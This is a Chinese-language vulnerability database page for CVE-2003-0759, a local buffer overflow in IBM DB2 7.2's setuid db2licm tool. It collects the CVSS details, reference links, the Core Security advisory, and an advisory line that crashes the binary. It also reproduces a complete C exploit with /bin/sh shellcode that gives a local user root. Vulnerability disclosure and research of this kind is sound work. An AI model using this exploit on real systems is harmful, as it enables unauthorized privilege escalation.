CVE-2003-0759
CVSS7.2
发布时间 :2003-10-06 00:00:00
修订时间 :2016-10-17 22:37:11
NMCOEPS    

[原文]Buffer overflow in db2licm in IBM DB2 Universal Data Base 7.2 before Fixpak 10a allows local users to gain root privileges via a long command line argument.


[CNNVD]IBM DB2 db2licm工具本地缓冲区溢出漏洞(CNNVD-200310-012)

        
        IBM DB2是一个大型的商业关系数据库系统,面向电子商务、商业资讯、内容管理、客户关系管理等应用,可运行于AIX、HP-UX、Linux、Solaris、Windows等系统。
        IBM DB2带了一个叫db2licm的工具,此程序实现上存在缓冲溢出漏洞,本地攻击者可能利用此漏洞获取主机的root用户权限。
        db2licm以suid root方式安装,程序安装的组属性是db2asgrp,用户db2inst1是db2asgrp组中的唯一用户,所以如果攻击者以db2inst1用户本地访问系统,就可能利用缓冲区溢出漏洞获取主机的root用户权限。此漏洞虽然证实存在于IBM DB2 v7.2 for Linux x86/s390,运行于其它操作系统上的系统也有可能受此漏洞影响。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0759
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0759
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200310-012
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2aixv7/FP10a_U495172/FixpakReadme.txt
(UNKNOWN)  CONFIRM  ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2aixv7/FP10a_U495172/FixpakReadme.txt
http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0114.html
(UNKNOWN)  VULNWATCH  20030918 CORE-2003-0531: Multiple IBM DB2 Stack Overflow Vulnerabilities
http://marc.info/?l=bugtraq&m=106389919618721&w=2
(UNKNOWN)  BUGTRAQ  20030918 CORE-2003-0531: Multiple IBM DB2 Stack Overflow Vulnerabilities
http://www-3.ibm.com/cgi-bin/db2www/data/db2/udb/winos2unix/support/aparlib.d2w/display_apar_details?aparno=IY47653
(UNKNOWN)  AIXAPAR  IY47653
http://www.ciac.org/ciac/bulletins/n-154.shtml
(UNKNOWN)  CIAC  N-154
http://www.coresecurity.com/common/showdoc.php?idx=366&idxseccion=10
(UNKNOWN)  MISC  http://www.coresecurity.com/common/showdoc.php?idx=366&idxseccion=10
http://www.securityfocus.com/bid/8553
(VENDOR_ADVISORY)  BID  8553

- 漏洞信息

IBM DB2 db2licm工具本地缓冲区溢出漏洞
高危 边界条件错误
2003-10-06 00:00:00 2005-10-20 00:00:00
本地  
        
        IBM DB2是一个大型的商业关系数据库系统,面向电子商务、商业资讯、内容管理、客户关系管理等应用,可运行于AIX、HP-UX、Linux、Solaris、Windows等系统。
        IBM DB2带了一个叫db2licm的工具,此程序实现上存在缓冲溢出漏洞,本地攻击者可能利用此漏洞获取主机的root用户权限。
        db2licm以suid root方式安装,程序安装的组属性是db2asgrp,用户db2inst1是db2asgrp组中的唯一用户,所以如果攻击者以db2inst1用户本地访问系统,就可能利用缓冲区溢出漏洞获取主机的root用户权限。此漏洞虽然证实存在于IBM DB2 v7.2 for Linux x86/s390,运行于其它操作系统上的系统也有可能受此漏洞影响。
        

- 公告与补丁

        厂商补丁:
        IBM
        ---
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://www-4.ibm.com/software/data/db2/linux/

- 漏洞信息 (106)

IBM DB2 Universal Database 7.2 (db2licm) Local Exploit (EDBID:106)
linux local
2003-09-27 Verified
0 Juan Escriba
N/A [点击下载]
/* 
	Local Exploit for db2licm 
	IBM db2 v 7.1 Linux/x86 

	vulnerability researched by 
	Juan Manuel Pascual Escriba
	pask at uninet.edu


 */



char sc[]=
"\x31\xc0"      /* begin setuid (0) */
"\x31\xdb"
"\xb0\x17"
"\xcd\x80"

"\xeb\x1f"
"\x5e"
"\x89\x76\x08"
"\x31\xc0"
"\x88\x46\x07"
"\x89\x46\x0c"
"\xb0\x0b"
"\x89\xf3"
"\x8d\x4e\x08"
"\x8d\x56\x0c"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\x40"
"\xcd\x80"
"\xe8\xdc\xff\xff\xff"
"/bin/sh";


#define STACK_TOP_X86 0xC0000000
#define ALG_MASK 0xfffffff4
#define ADDR 1000
#define DB2LICM "/home/db2inst1/sqllib/adm/db2licm"

#define DFL_ALG 4       

int main(int arc, char **arv){
        char *argv[3];
        char *envp[2];
        unsigned long sc_address, ba=0;
        unsigned char alg = DFL_ALG;
        unsigned long *p;
        unsigned char *q;
        unsigned int i;



        sc_address = STACK_TOP_X86 - 4 - strlen(DB2LICM) - sizeof(sc) - 1;
        printf("shellcode address = 0x%X\n",sc_address);


        if( (sc_address & ALG_MASK) != sc_address ) {
                ba = sc_address - (sc_address & ALG_MASK);
                printf("adding %d trailing bytes to backward align Shellcode to 0x%X\n", ba,
sc_address & ALG_MASK);
                sc_address = STACK_TOP_X86 - 4 - strlen(DB2LICM) - sizeof(sc) - ba - 1;
                printf("new shellcode address = 0x%X\n",sc_address);
        }

        envp[0] = (char*)malloc(sizeof(sc)+strlen("pete=")+1+ba);
        q = envp[0];
        strcpy(q,"pete=");
        q += strlen("pete=");
        memcpy(q,sc,sizeof(sc));
        q += sizeof(sc)-1;
        memset(q,'A',ba);
        q += ba;
        *q = 0;
        envp[1] = 0;

        /* build overflowing arvg[2] */


        printf("using alignment = %d in overflow buffer\n",alg);

        argv[0] = DB2LICM;
	argv[1] = "-a";
        argv[2] = (char*)malloc(ADDR*sizeof(unsigned long)+alg+1);
        memset(argv[2],'A',alg);
        p=(unsigned long*)(argv[2]+alg);
        for(i=0;i<ADDR;i++) {
                *p = sc_address;
                p++;
        };
        *p = 0;
        argv[3] = 0; 

        printf("executing %s ...\n\n",argv[0]);
        execve(argv[0],argv,envp); 


}

// milw0rm.com [2003-09-27]
		

- 漏洞信息 (F31725)

IBM-DB2-db2licm.c (PacketStormID:F31725)
2003-09-26 00:00:00
Juan Manuel Pascual Escriba  concepcion.upv.es
exploit,local,root
linux
CVE-2003-0758,CVE-2003-0759
[点击下载]

Local root exploit for IBM DB2 Universal Database version 7.2 for Linux/s390 which makes use of the db2licm binary that is setuid by default.

- 漏洞信息 (F31666)

core.db2.txt (PacketStormID:F31666)
2003-09-18 00:00:00
Juan Pablo Martinez Kuhn  coresecurity.com
advisory,overflow,local,root
linux
CVE-2003-0758,CVE-2003-0759
[点击下载]

Core Security Technologies Advisory ID: CORE-2003-0531 - IBM DB2 Universal Data Base v7.2 for Linux/s390 has two binaries in a default install which are setuid to root and have owner and group execute capabilities. These binaries are vulnerable to buffer overflow attacks from a local user that is in the same group.

Core Security Technologies Advisory
                            http://www.coresecurity.com

                  Multiple IBM DB2 Stack Overflow Vulnerabilities



Date Published: 2003-09-18

Last Update: 2003-09-18

Advisory ID: CORE-2003-0531

Bugtraq ID: 8552, 8553

CVE Name: CAN-2003-0758, CAN-2003-0759

Title: Multiple IBM DB2 Stack Overflow Vulnerabilities

Class: Boundary Error Condition (Buffer Overflow)

Remotely Exploitable: No

Locally Exploitable: Yes

Advisory URL: 
 http://www.coresecurity.com/common/showdoc.php?idx=366&idxseccion=10

Vendors contacted: 
- IBM:
  . Core Notification: 2003-08-15
  . Notification acknowledged by IBM: 2003-08-18
  . Fixes available for [CAN-2003-0758]: 2003-08-31
  . Fixes available for [CAN-2003-0759]: 2003-09-17

Release Mode: COORDINATED RELEASE


*Vulnerability Description:*

 DB2 is IBM's relational database software, oriented toward the 
 deployment and development of e-business, business intelligence, 
 content management, enterprise resource planning and customer 
 relationship management solutions. DB2 can be deployed in
 AIX, HP-UX, Linux, Solaris and Windows environments.

 IBM's DB2 database ships with two vulnerable setuid binaries, namely
 db2licm and db2dart. Both binaries are vulnerable to a buffer overflow
 that allows a local attacker to execute arbitrary code on the
 vulnerable machine with privileges of the root user. The vulnerability
 is triggered providing a long command line argument to the binaries.

 By default (in the environment available during research), the
 vulnerable binaries have the following privileges (for example in the
 case of db2licm):
 
 -r-sr-x---    1 root     db2iadm1    31926 Jun 21  2002 /home/db2inst1/sqllib/adm/db2licm
 -r-sr-x---    1 root     db2asgrp    31926 Jun 21  2002 /home/db2as/sqllib/adm/db2licm

 The db2as is the only user of the db2iadm1 group, and db2inst1 is the
 only user of the db2asgrp group. So, in a default install, an attacker
 with access to the system with any those accounts, will be able to
 escalate privileges to the root account.
 

*Vulnerable Packages:*

 IBM DB2 Universal Data Base v7.2 for Linux/x86 is vulnerable.
 IBM DB2 Universal Data Base v7.2 for Linux/s390 is vulnerable.

 Other IBM DB2 versions and target platforms were not available for
 testing, but may be vulnerable as well.


*Solution/Vendor Information/Workaround:*

 [BID 8552, CAN-2003-0758]
 The db2dart issue is fixed in Fixpak 10 for DB2 v7.2.

 Fixpak 10 is available at:
 http://www-3.ibm.com/cgi-bin/db2www/data/db2/udb/winos2unix/support/download.d2w/report


 [BID 8553, CAN-2003-0759]
 The db2licm issue is fixed in Fixpak 10a for DB2 v7.2.

 Fixpak 10a will soon be available at:
 http://www-3.ibm.com/cgi-bin/db2www/data/db2/udb/winos2unix/support/v7fphist.d2w/report

 If Fixpak 10a is not already available in this webpage, you
 can download it from IBM's FTP site. For example the 32-bit Intel
 Linux version of fixpack 10a is located at:
 ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2linuxv7/FP10a_U495179

 

*Credits:*

 This vulnerability was found by Juan Pablo Martinez Kuhn from 
 Core Security Technologies. 
 We wish to thank Juan Manuel Pascual Escriba for his cooperation 
 testing and confirming the vulnerabilities. We also wish to thank
 Scott Logan from IBM for his quick response to this issue.


*Technical Description - Exploit/Concept Code:*

 The following tests are enough to confirm a binary is vulnerable.
 Executing these perl scripts should produce a segmentation fault
 in vulnerable binaries:

 [BID 8552, CAN-2003-0758]

 /home/db2as/sqllib/adm/db2dart `perl -e 'print "A"x1287'`

 Segmentation fault


 [BID 8553, CAN-2003-0759]

 /home/db2as/sqllib/adm/db2licm `perl -e 'print "A"x999'`
 ...
 User Response:  Enter the name of a file that exists and can be
 opened and try the command again.

 Segmentation fault
 ...

 Both binaries suffer from a simple stack based buffer overflow.
 Exploitation of the vulnerabilities is trivial. To confirm the
 exploitability, sample exploit code was developed for DB2 7.1 binaries
 for the Linux operating system running on x86 and s390 systems.


*About Core Security Technologies*

 Core Security Technologies develops strategic security solutions for
 Fortune 1000 corporations, government agencies and military
 organizations. The company offers information security software and
 services designed to assess risk and protect and manage information
 assets.
 Headquartered in Boston, MA, Core Security Technologies can be reached
 at 617-399-6980 or on the Web at http://www.coresecurity.com.

 To learn more about CORE IMPACT, the first comprehensive penetration
 testing framework, visit:
 http://www.coresecurity.com/products/coreimpact


*DISCLAIMER:*

 The contents of this advisory are copyright (c) 2003 CORE Security
 Technologies and may be distributed freely provided that no fee is
 charged for this distribution and proper credit is given.

$Id: db2-advisory.txt,v 1.4 2003/09/18 11:05:35 carlos Exp $


    

- 漏洞信息

2171
IBM DB2 db2licm Command Line Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

A local overflow exists in IBM DB2. The 'db2licm' binary fails to perform proper bounds checking resulting in a buffer overflow. By passing an overly long command line argument to the binary, a malicious user can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2003-09-18 2003-08-15
2003-09-18 2003-09-17

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, IBM has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

IBM DB2 db2licm Buffer Overflow Vulnerability
Boundary Condition Error 8553
No Yes
2003-09-18 12:00:00 2009-07-11 11:56:00
Discovery of this vulnerability has been credited to Juan Pablo Martinez Kuhn from Core Security Technologies.

- 受影响的程序版本

IBM DB2 Universal Database for Linux 7.2

- 漏洞讨论

It has been reported that the IBM DB2 db2licm utility is prone to locally exploitable buffer overflow vulnerability. A local attacker, who can authenticate or has access as the db2inst1 user, may exploit this issue to execute arbitrary instructions with elevated privileges. Specifically, user 'root' privileges.

Although this vulnerability has been reported to affect IBM DB2 v7.2 for Linux x86/s390. Other IBM DB2 versions and target platforms may also be affected.

- 漏洞利用

The following proof of concept has been supplied:

/home/db2as/sqllib/adm/db2licm `perl -e 'print "A"x999'`

Exploit code has been developed:

- 解决方案

Fixpack version 10a has been released to address this issue.


IBM DB2 Universal Database for Linux 7.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站